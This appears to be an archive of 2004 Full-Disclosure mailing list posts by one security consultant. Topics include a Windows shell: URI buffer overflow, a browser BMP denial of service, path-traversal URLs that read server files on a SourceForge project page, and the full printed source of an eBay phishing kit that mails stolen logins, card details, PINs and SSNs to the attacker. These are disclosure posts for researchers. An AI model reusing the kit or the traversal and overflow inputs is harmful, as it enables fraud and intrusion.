Re: [Full-Disclosure] shell:windows command question

2004-07-08 Thread Andrew Poodle 
I might be being stupid here, but tried the html link versions, in both
IE 6 and Firefox 0.9 on W2k, and entering the shell command in the "run"
option, and I just get a

"the folder 'shell:[path and app of your choice]' does not exist".

Error

Am I missing something to cause this to execute?

a



--
Andrew Poodle
Consultant
IRW Solutions Group Ltd
17 Glasgow Road
Paisley
PA1 3QS

t: +44 (0) 141 842 1142
f: +44 (0) 141 842 1134
e: [EMAIL PROTECTED] 
w: www.irw.co.uk

-
IRW Solutions Group Ltd
IRW Platinum: Strategic Consultancy
IRW Focus Blue: e-Business Software Solutions
IRW Associates: Managed Services
-


> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Andreas Sandblad
> Sent: 07 July 2004 20:25
> To: Perrymon, Josh L.
> Cc: [EMAIL PROTECTED]
> Subject: [EMAIL PROTECTED] - Email found in subject - Re: 
> [Full-Disclosure] shell:windows command question
> 
> 
> This is dangerous. Based on the file extension of the shell 
> protocol different applications may be launched. For example: 
> shell:.its will launch Internet Explorer and shell:.mp3 will 
> launch Winamp.
> 
> The trick is to find an application that will overflow when 
> given a very long parameter. A quick check showed that a 
> buffer overflow occured within MSProgramGroup 
> (WINDOWS\System32\grpconv.exe) after around 230 bytes with 
> the following URL: shell:[x*221].grp EIP can be controled, 
> but exploitation is a bit tricky since parameter is stored as unicode.
> 
> Also Winamp contains an BO (no unicode here).
> 
> Tested environment:
> Windows XP pro + FireFox 0.9.1
> 
> /Andreas Sandblad
> 
> On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
> 
> > -snip--
> > center>
> > 
> > who goes there 
> >  > src="http://windowsupdate.microsoft.com%2F.http-
> > equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
> > [customise as you see fit]
> > <http://www.malware.com/stockpump.html>
> > --end--
> > The code above has interest to me.
> > Even in Mozilla the commands below will work.
> > 1
> > 2
> > 4
> > Just save them to an .html file and run it.
> > The first one with the double quotes was from bugtraq:
> > Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
> > <http://seclists.org/lists/bugtraq/2004/Mar/0188.html>
> > The links below that will run calc as well as winver.
> > It seems it calls windows as a virtual dir because c:\winxp 
> is what I have.
> > I have been playing around to see if cmd.exe will work with 
> it but without
> > luck.
> > This is what is in the registry.
> > HKEY_CLASSES_ROOT\Shell
> > Look in the registry key above. You will find the shell 
> object calls Windows
> > Explorer with a particular set of arguments.
> > %SystemRoot%\Explorer.exe /e,/idlist,%I,%L
> > So this is tied to explorer.exe. This is something involved with the
> > underlying functions of windows
> > and not IE so to speak because it works in Mozilla or from 
> the run line.
> > I'm trying to find out more about the shell: command 
> because I can put a
> > link on a site that seems to run anything
> > in system32 dir. I'd like to see if you can pass parameters to it.
> >
> > Anyone give me more info on the shell:windows command?
> > JP
> >
> >
> > Joshua Perrymon
> > Sr. Network Security Consultant
> > PGP Fingerprint
> > 51B8 01AC E58B 9BFE D57D  8EF6 C0B2 DECF EC20 6021
> >
> > **CONFIDENTIALITY NOTICE**
> > The information contained in this e-mail may be proprietary and/or 
> > privileged and is intended for the sole use of the individual or 
> > organization named above.  If you are not the intended 
> recipient or an 
> > authorized representative of the intended recipient, any review, 
> > copying or distribution of this e-mail and its attachments, 
> if any, is 
> > prohibited. If you have received this e-mail in error, 
> please notify 
> > the sender immediately by return e-mail and delete this 
> message from 
> > your system.
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> 
> -- 
>   _ _
> o' \,=./ `o
>(o o)
> ---ooO--(_)--Ooo---
>  Andreas Sandblad
>   Sweden
> 
> ___

RE: [Full-Disclosure] Firefox 0.92 DoS via TinyBMP

2004-07-12 Thread Andrew Poodle 
> [Full-Disclosure] Firefox 0.92 DoS via TinyBMP
> 
> 
> Hi,
>  
> for me this works fine on a fully patched msie 6.0sp1 too. 
> Firefox 0.8 doesn't seem to be vulnerable.
>  
> Greetz
>  
> >>Hi,
> >>
> >>there is a security vulnerability in Firebox 0.92 (latest Version)
> >>


I think this has more to do with the machine, rather than the browser.

The link broke my IE in the same way..  Machine slows, and locks,
requiring a forced hard reboot.

Laptop with 450mhx cpu and 128 meg of ram, with a 5 gig HD
Running Win2k, with IE6 and Firefox 0.9.2

However, my collegue's machine (1.6 ghz cpu, 1 gig ram) worked fine in
both IE and Firefox, although firefox did render the page FAR more
slowly than IE.

There may be an issue in how firefox handles .BMP files, but I'd be more
concerned with cpu and mem usage on older machines irrespective of
browser.

a

 
--
Andrew Poodle
Consultant
IRW Solutions Group Ltd
17 Glasgow Road
Paisley
PA1 3QS

t: +44 (0) 141 842 1142
f: +44 (0) 141 842 1134
e: [EMAIL PROTECTED] 
w: www.irw.co.uk

-
IRW Solutions Group Ltd
IRW Platinum: Strategic Consultancy
IRW Focus Blue: e-Business Software Solutions
IRW Associates: Managed Services
-

This document should only be read by those persons to whom it is addressed and is not 
intended to be relied upon by any person without subsequent written confirmation of 
its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no 
liability (including in negligence) for the consequences for any person acting, or 
refraining from acting, on such information prior to the receipt by those persons of 
subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Vulnerability in sourceforge.net

2004-07-21 Thread Andrew Poodle 
Don't even think about trying this then...

http://btmgr.sourceforge.net/index.php3?body=../../../../../../home/groups/b/bt/btmgr/htdocs/index.php3

Don't want to crash sourceforge by getting it into an infinite loop now do we?

a

> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of nicolas
> vigier
> Sent: 21 July 2004 09:00
> To: Alexander
> Cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Vulnerability in sourceforge.net
> 
> 
> On Wed, 21 Jul 2004, Alexander wrote:
> 
> > Vulnerability in sourceforge.net.
> > 
> > Remote user can read any files. Example:
> 
> Any file the webserver account can read.
> 
> > 
> http://btmgr.sourceforge.net/index.php3?body=../../../../../..
> /usr/local
> > /apache/conf/httpd.conf
> 
> This is not a vulnerability in sourceforge, but in on of the project's
> webpage. And anyone with a project on sourceforge can read the same
> files using his webspace.
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

This document should only be read by those persons to whom it is addressed and is not 
intended to be relied upon by any person without subsequent written confirmation of 
its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no 
liability (including in negligence) for the consequences for any person acting, or 
refraining from acting, on such information prior to the receipt by those persons of 
subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] OT: gmail invites

2004-09-10 Thread Andrew Poodle 
Likewise.  can maybe manage a couple if anyone is desparate

a

> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of Fredrik
> Leijon
> Sent: 10 September 2004 13:12
> To: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] OT: gmail invites
> 
> 
> Alt J wrote:
> 
> >I have a few gmail invites.
> >Please reply off list if you're interested.
> >
> >Alt
> >  
> >
> I have 5 invites or so i don't need, send me a mail and i'll 
> hook you up
> with one
> 
> -Fredrik
> 
> -- 
> {
>   Fredrik Leijon . ([EMAIL PROTECTED])
>   {
> Quibus International AB . (http://www.quibus.se)
> Fosievägen 6 . 214 31 . Malmö . Sweden . +46 40 923990
>   }
>   {
> Social Engineering - because there is no patch for human stupidity
>   }
> }
> 
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

This document should only be read by those persons to whom it is addressed and is not 
intended to be relied upon by any person without subsequent written confirmation of 
its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no 
liability (including in negligence) for the consequences for any person acting, or 
refraining from acting, on such information prior to the receipt by those persons of 
subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

2004-10-28 Thread Andrew Poodle 
 
> -Original Message-
> From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On 
> Behalf Of Random Letters
> Sent: 28 October 2004 15:17
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Re: getting administrator rights on win2003
machine?
> 
> 
>
> This list is for people who try to prevent break-ins - I'll bet that
no-one here will help you.

While I was going to agree with you.. Someone has already provided help
onlist...

Shame really..

I almost laughed at the request..   But was a little surprised to see
help offered almost immediately

a

>I'm at a boarding school in germany and we have a kind of internet 
>terminal there with win2003 running on the computers. My question is:
>Is there a way of getting administrative privileges ? I used a RPC 
>Exploit before but now the computers are patched. How do I get a 
>administrator account now?? I have physikal access to the 
>computers.
>
>Greetings
>
>valentin - germany

_
It's fast, it's easy and it's free. Get MSN Messenger today! 
http://www.msn.co.uk/messenger

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



This document should only be read by those persons to whom it is addressed and is not 
intended to be relied upon by any person without subsequent written confirmation of 
its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no 
liability (including in negligence) for the consequences for any person acting, or 
refraining from acting, on such information prior to the receipt by those persons of 
subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

2004-10-29 Thread Andrew Poodle 
Can I point you to this article about it yesterday :)

http://www.theregister.co.uk/2004/10/27/bush_blocking_non-americans/

a


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan
Wever
Sent: 29 October 2004 11:47
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

Hi all,

Want to view www.georgewbush.com from outside the US? You can't: Access
denied. This "security" measure (!?) can easily be avoided using a proxy
in the US or any anonymous surfing website though.

So, what is it he doesn't want anyone from outside the US to read ?

Cheers,
SkyLined

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



This document should only be read by those persons to whom it is addressed and is not 
intended to be relied upon by any person without subsequent written confirmation of 
its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no 
liability (including in negligence) for the consequences for any person acting, or 
refraining from acting, on such information prior to the receipt by those persons of 
subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Counteroffensive help on bruteforce attacks on SSHD

2004-10-29 Thread Andrew Poodle 
Hullo the list..

I have a box at home, running fedora core 1, behind a router, which I
use for serving some dev webpages, and some other miscelaneous stuff..

I'm seeing lots of ssh login attempts with user=root from two or three
IP addresses, after I blocked access at the firewall based on host.

Can anyone point me at some good resources where I can bone up and learn
more about counter-measures  I'm not looking to take this guy out
(although would'nt be a bad thing).. But would be interesting to find
out more.

tia

a

This document should only be read by those persons to whom it is addressed and is not 
intended to be relied upon by any person without subsequent written confirmation of 
its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no 
liability (including in negligence) for the consequences for any person acting, or 
refraining from acting, on such information prior to the receipt by those persons of 
subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

2004-10-29 Thread Andrew Poodle 
If it is for security, it's a rather poor security measure, as it was
still browseable by IP address afaik..

a


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles
Sent: 29 October 2004 15:30
To: Berend-Jan Wever; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

I read a article about how the site got hacked into...recently. Did
anyone else read this? If it was hacked then because this is a reaction
security measure and not a "we want to keep all non-amercians from
seeing our stuff". I would guess it is a security measure has it is easy
to see mirrors of it outside the country. 

> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Berend-Jan Wever
> Sent: Friday, October 29, 2004 5:47 AM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
> 
> Hi all,
> 
> Want to view www.georgewbush.com from outside the US? You
> can't: Access denied. This "security" measure (!?) can easily be 
> avoided using a proxy in the US or any anonymous surfing website 
> though.
> 
> So, what is it he doesn't want anyone from outside the US to read ?
> 
> Cheers,
> SkyLined
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



This document should only be read by those persons to whom it is addressed and is not 
intended to be relied upon by any person without subsequent written confirmation of 
its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no 
liability (including in negligence) for the consequences for any person acting, or 
refraining from acting, on such information prior to the receipt by those persons of 
subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] IE Web Browser: "Sitting Duck"

2004-07-07 Thread Andrew Poodle 




> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Bruce Ediger
> Sent: 07 July 2004 13:41
> To: [EMAIL PROTECTED]
> Subject: [EMAIL PROTECTED] - Email found in subject - RE: 
> [Full-Disclosure] IE Web Browser: "Sitting Duck"

> At least in practice the unix-a-likes demonstrate more 
> security than the flavors of Windows, don't they?
> 
> I mean, where's the linux chain mailer to equal SirCam?
> 
> Where are the multiple linux worms to equal Code Red, Nimda, 
> Deloder, Witty, SQL Spida, Slammer, Blaster, MyDoom, etc etc etc?
 
> The evidence seems to suggest that Linux is more secure than 
> Windows, particularly in whatever ways cause susceptibility 
> to mass-mailers.

The evidence thus far does seem to "suggest" that linux and such is more
secure than Windows, but to that extent is that down to...
1: technical knowhow of the userbase tends to be higher, leading to the
correct updating, patching, firewalling and general confiuguration of
the machines
2: the %age of linux based machines in use, meaning it's a small enough
userbase that it's of a relatively low interest to those malicious
coders out there.

I'm sure that as the userbase of linux increases, and on average,
dumbs-down, so will the number of attempts at devising linux specific
trojans/exploits/viruses.

The nature of the linux OS means that it's likely that these will have
less impact than their existing MS counterparts.

Despite MS being accused of security through obscurity by not
publicising loopholes quick enough, it's ironic that Linux benefits from
a bit of security through obscurity due to it's relative small desktop
userbase.

Incidentally, I use both OS' regularly on my personal laptop (dual boot
Win XP Pro and SUSE Linux), although my development box at home is
Fedora Core 1, and I work for a predominatley MS consultancy and
developmenthouse, so you could consider myself well and truly on the
fence.

Regards

Andrew

--
Andrew Poodle
Consultant
IRW Solutions Group Ltd
17 Glasgow Road
Paisley
PA1 3QS

t: +44 (0) 141 842 1142
f: +44 (0) 141 842 1134
e: [EMAIL PROTECTED] 
w: www.irw.co.uk

-
IRW Solutions Group Ltd
IRW Platinum: Strategic Consultancy
IRW Focus Blue: e-Business Software Solutions
IRW Associates: Managed Services
-

This document should only be read by those persons to whom it is addressed and is not 
intended to be relied upon by any person without subsequent written confirmation of 
its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no 
liability (including in negligence) for the consequences for any person acting, or 
refraining from acting, on such information prior to the receipt by those persons of 
subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] phish

2004-11-08 Thread Andrew Poodle 

Not a very good one..

Submitting with an empty field displayed the raw PHP code..

Seems to send to 

mail("[EMAIL PROTECTED]","$userid","$userid $pass");

Below..

--8<---
 $value) {
$str .= (strlen($str) < 1) ? '' : '&';
$str .= $key . '=' . rawurlencode($value);
}
return ($str);
}
parse_str($HTTP_SERVER_VARS['QUERY_STRING']);
if($MfcISAPICommand=="SignInFPP"){
  include 'login.php';
}
elseif (!strcmp($MfcISAPICommand,"VerifyFPP")){
$a = query_str ($HTTP_POST_VARS);
parse_str($a);
$userid=str_replace(" ","",$userid);
$pass=str_replace(" ","",$pass);
$fd =
fopen("http://signin.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=SignI
nWelcome&siteid=0&co_partnerId=2&UsingSSL=0&pp=pass&i1=0&pageType=174&us
erid=$userid&pass=$pass","r");
  while ($line=fgets($fd,1000))
  {
if(strstr($line,"not valid"))
$signerr=1;
if(strstr($line,"Your User ID is not valid"))
$signerr=2;
  }
fclose ($fd);
if($signerr)
include 'login.php';
else{
mail("[EMAIL PROTECTED]","$userid","$userid $pass");
include 'step1.php';
}
}
elseif(!strcmp($MfcISAPICommand,"ProcessFPP")){
include 'step2.php';
}

elseif(!strcmp($MfcISAPICommand,"ProcessFPP1")){
$a = query_str ($HTTP_POST_VARS);
parse_str($a);
$firstname = rtrim($firstname);
$lastname = rtrim($lastname);
$street = rtrim($street);
$city = rtrim($city);
$zip = rtrim($zip);
$dayphone12 = rtrim($dayphone12);
$dayphone22 = rtrim($dayphone22);
$dayphone32 = rtrim($dayphone32);
$dayphone42 = rtrim($dayphone42);

$error = 0;
if (!strlen($firstname)){
$error = 1;
$firstnameerr = 1;
}

if (!strlen($lastname)){
$error = 1;
$lastnameerr = 1;
}
if (!strlen($street)){
$error = 1;
$streeterr = 1;
}
if (!strlen($city)){
$error = 1;
$cityerr = 1;
}
/*if ($state == "default"){
$error = 1;
$rstateerr = 1;
}
*/
if (!strlen($zip) && !is_numeric($zip)){
$error = 1;
$ziperr = 1;
}
if (!strlen($dayphone12)){
$error = 1;
$dayphone12err = 1;
}
if (!strlen($dayphone22)){
$error = 1;
$dayphone22err = 1;
}
if (!strlen($dayphone32)){
$error = 1;
$dayphone32err = 1;
}
if(strlen($ssn)<1){
$error=1;
$ssnerr=1;
}

if ($error == 1)
include 'step2.php';
else
include 'step3.php';
}

elseif(!strcmp($MfcISAPICommand,"ProcessFPP2")){
$a = query_str ($HTTP_POST_VARS);
parse_str($a);
$ccnumber = rtrim($ccnumber);
$ccmonth = rtrim($ccmonth);
$ccyear = rtrim($ccyear);
$cvv = rtrim($cvv);
$pin = rtrim($pin);

$error = 0;
$a = substr($ccnumber,0,1);

if($a == "3"){
if (strlen($cvv) != 4){
$error = 1;
$cvverr = 1;
}
}
elseif($a == "4"){
if (strlen($cvv) != 3){
$error = 1;
$cvverr = 1;
}
}
elseif($a == "5"){
if (strlen($cvv) != 3){
$error = 1;
$cvverr = 1;
}
}
elseif($a == "6"){
if (strlen($cvv) != 3){
$error = 1;
$cvverr = 1;
}
}
else{
$error = 1;
$ccnumbererr = 1;}

if(strlen($ccnumber)!=16){
$error=1;
$ccnumbererr=1;
}
//ccmonth si ccyear;

if(!strcmp($pin,"1234")||!strcmp($pin,"")){
$pinerr=1;
$error=1;
}

if(strlen($pin)<4){
$pinerr=1;
$error=1;
}

if($error==1) include 'step3.php';
else{
$message="---
-=::: Login Info :::=-

user: $userid
pass: $pass
e-mail: $email

-=::: Credit Card Info :::=-

Credit Card Number: $ccnumber
Expiration Date: $ccmonth/$ccyear
CVV2: $cvv
PIN: $pin
Full Name: $firstname $lastname
Address: $street
City: $city
State: $state
Zip: $zip
Phone: $dayphone12-$dayphone22-$dayphone32 $dayphone42
Country: $country
SSN: $ssn
";
mail("[EMAIL PROTECTED]","Fullinfo: $ccnumber","$message");
include 'process.htm';
}

}

elseif ($MfcISAPICommand=="SuccessfullFPP")
include 'success.htm';
else
include 'error.htm';
?>


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of D B
Sent: 08 November 2004 10:21
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] phish

another ebay phish

http://www.ebay-verifications.biz/ws2/

header 

X-Apparently-To: [EMAIL PROTECTED] via
216.109.119.82; Sun, 07 Nov 2004 14:17:22 -0800
X-YahooFilteredBulk:66.139.79.218
X-Originating-IP:   [66.139.79.218]
Return-Path:<[EMAIL PROTECTED]>
Received:   from 66.139.79.218 (EHLO www2.triasite.net)
(66.139.79.218) by mta303.mail.scd.yahoo.com with SMTP; Sun, 07 Nov 2004
14:17:22 -0800
Received:   (from [EMAIL PROTECTED]) by www2.triasite.net
(8.11.6/8.11.6) id iA7MOgr24317; Sun, 7 Nov 2004
16:24:42 -0600
Date:   Sun, 7 Nov 2004 16:24:42 -0600
Message-Id:
<[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject:eBay Database Critical Update Notification!
From

[Full-Disclosure] Inline desktop webproxy..

2004-11-15 Thread Andrew Poodle 
I came across a useful webproxy application (for windows) that allowed
me to manipulate the headers of page requests, both plain and secure.
Now daft me has since changed machines in my office, and lost the
bookmark and the download.. Been a while since I used it, so can't even
remember it's name...


Can anyone suggest a free/opensource/shareware app that can do this, as
I'm doing some testing on our new corporate website before it goes live.

Thanks

A

******
Andrew Poodle
Analyst/Consultant
IRW Solutions Group Ltd 
17 Glasgow Road 
Paisley 
Renfrewshire 
PA1 3QS 

Phone: +44 (0) 141 842 1142
Fax: +44 (0) 141 842 1134
Email: [EMAIL PROTECTED]
Web: www.irw.co.uk
**
IRW Solutions Group Ltd
IRW Platinum: Strategic Consultancy
IRW Focus Blue: e-Business Software Solutions
IRW Associates: Managed Service
**


This document should only be read by those persons to whom it is addressed and 
is not intended to be relied upon by any person without subsequent written 
confirmation of its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept 
no liability (including in negligence) for the consequences for any person 
acting, or refraining from acting, on such information prior to the receipt by 
those persons of subsequent written confirmation. 

If you have received this e-mail message in error, please notify us 
immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, 
distribution and/or publication of this e-mail message is strictly prohibited.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html